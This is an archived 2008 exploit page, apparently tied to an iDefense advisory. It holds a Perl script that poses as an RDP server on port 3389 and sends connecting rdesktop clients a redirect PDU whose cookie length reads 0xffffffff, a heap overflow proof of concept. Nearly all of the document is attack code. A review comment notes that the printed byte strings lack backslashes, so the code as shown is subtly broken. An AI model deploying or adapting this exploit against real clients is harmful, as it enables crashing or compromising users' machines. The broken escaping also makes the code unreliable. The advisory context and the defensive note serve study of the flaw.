
rdesktoppdu-overflow.txt

Posted on 13 May 2008

#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697
#
# Test listener for the redirect-PDU length handling issue covered by the
# advisory above.  It binds TCP port 3389 on all interfaces and, for every
# line a connected client sends, writes seven canned packets followed by one
# final packet.  Per the original annotations that final packet is typed
# PDU_REDIRECT and announces a g_redirect_cookie length of ff ff ff ff while
# carrying only 64 filler units.
#
# NOTE(review): every byte string on this page is printed as "x03x00..."
# with no backslash before each "x", so Perl treats them as plain text and
# not as the byte values the annotations describe.  They are reproduced here
# exactly as printed.
#
# Defensive reading: a client has to compare a peer-supplied length field
# with the bytes actually left in the packet, and with the size of the
# destination buffer, before copying.  A redirect PDU whose cookie length
# exceeds the remaining packet data is malformed and can be rejected or
# alerted on.

use strict;
use IO::Socket;

# Single-backlog listening socket on the standard RDP port.
my $listener = IO::Socket::INET->new(
    LocalAddr => '0.0.0.0',
    LocalPort => '3389',
    Listen    => 1,
    Reuse     => 1,
) or die($!);

# Final packet, assembled field by field (field notes are the original
# author's; the unannotated fields are not explained on the page).
my $redirect_pdu = join(
    '',
    "x03x00x01x47x02xf0x80x68x00x01x03xebx70x81x38",
    "x01x00x10x00",
    "xc5x32",
    "x04x75",            # PDU TYPE == 0x4 == PDU_REDIRECT
    "xb7xdaxf8x43",
    "x01x00x00x00",
    "x01x00x00x00",
    "xffxffxffxff",      # len of g_redirect_cookie
    "x41" x 64,          # g_redirect_cookie
);

# Serve clients one at a time; each input line read from the client triggers
# one complete reply sequence on the same connection.
while (my $client = $listener->accept()) {
    while (defined(my $line = <$client>)) {
        my @replies = (
            ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(),
            $redirect_pdu,
        );
        print {$client} @replies;
    }
}

# The seven canned packets below are sent in order ahead of the final packet.
# The page does not label them; presumably they are the connection-setup
# replies a client expects before it processes later PDUs -- confirm against
# a protocol reference.

# Canned packet 1.
sub ONE() {
    return "x03x00x00x0bx06xd0x00x00x12x34x00";
}

# Canned packet 2 (the longest of the seven).
sub TWO() {
    return join(
        '',
        "x03x00x01x49x02xf0x80x7fx66x82x01",
        "x3dx0ax01x00x02x01x00x30x1ax02x01",
        "x22x02x01x03x02x01x00x02x01x01x02",
        "x01x00x02x01x01x02x03x00xffxf8x02",
        "x01x02x04x82x01x17x00x05x00x14x7c",
        "x00x01x2ax14x76x0ax01x01x00x01xc0",
        "x00x4dx63x44x6ex81x00x01x0cx08x00",
        "x04x00x08x00x03x0cx0cx00xebx03x01",
        "x00xecx03x00x00x02x0cxecx00x02x00",
        "x00x00x02x00x00x00x20x00x00x00xb8",
        "x00x00x00x29x60xbbx2fxc4x4dx00x9e",
        "x58x8axb4x85x35x6ax71xeaxadxf9x3d",
        "x0ex5ex8ex87x64x2dx52x42xedxb2x91",
        "x3fxf9x01x00x00x00x01x00x00x00x01",
        "x00x00x00x06x00x5cx00x52x53x41x31",
        "x48x00x00x00x00x02x00x00x3fx00x00",
        "x00x01x00x01x00xf9xa3x35xb2x78x63",
        "x8dx94x65x47x22x54x49x55xaex6fx74",
        "x69x73x6exeex2bxa5xd0x47xf6xc0x89",
        "x2exa0x54xf5x12x87x75xb5x89xf7x83",
        "x48xd9x54xebxdex20x73xd6xd8xf3xee",
        "x0fxf7xc2xaaxa4x79x0ax5ax64x92x53",
        "xc4x75xd4x00x00x00x00x00x00x00x00",
        "x08x00x48x00xf6x20x04x62x5bx2fx04",
        "xaex02x04x4ax7excfx59x02x11xf7x7f",
        "xabx74x95xcex01x4exf6x14x50x0bxd7",
        "x54x8fxf0x92xd5x0cx6fx42xd8x21x98",
        "x9fx87x50x9ax33x6cxefx65x05x5cx4a",
        "x93x51xc1x69x59x7cx3dxf4x63xdcx53",
        "x66x3bx00x00x00x00x00x00x00x00",
    );
}

# Canned packet 3.
sub THREE() {
    return "x03x00x00x0bx02xf0x80x2ex00x00x04";
}

# Canned packets 4-6 differ only in their trailing four units.
sub FOUR() {
    return "x03x00x00x0fx02xf0x80x3ex00x00x04x03xedx03xed";
}

sub FIVE() {
    return "x03x00x00x0fx02xf0x80x3ex00x00x04x03xebx03xeb";
}

sub SIX() {
    return "x03x00x00x0fx02xf0x80x3ex00x00x04x03xecx03xec";
}

# Canned packet 7, the last one sent before the final packet.
sub SEVEN() {
    return "x03x00x00x22x02xf0x80x68x00x01x03xebx70x14x80x02x10x00xffx03x10x00x07x00x00x00x02x00x00x00x30x9ax00x00";
}

 
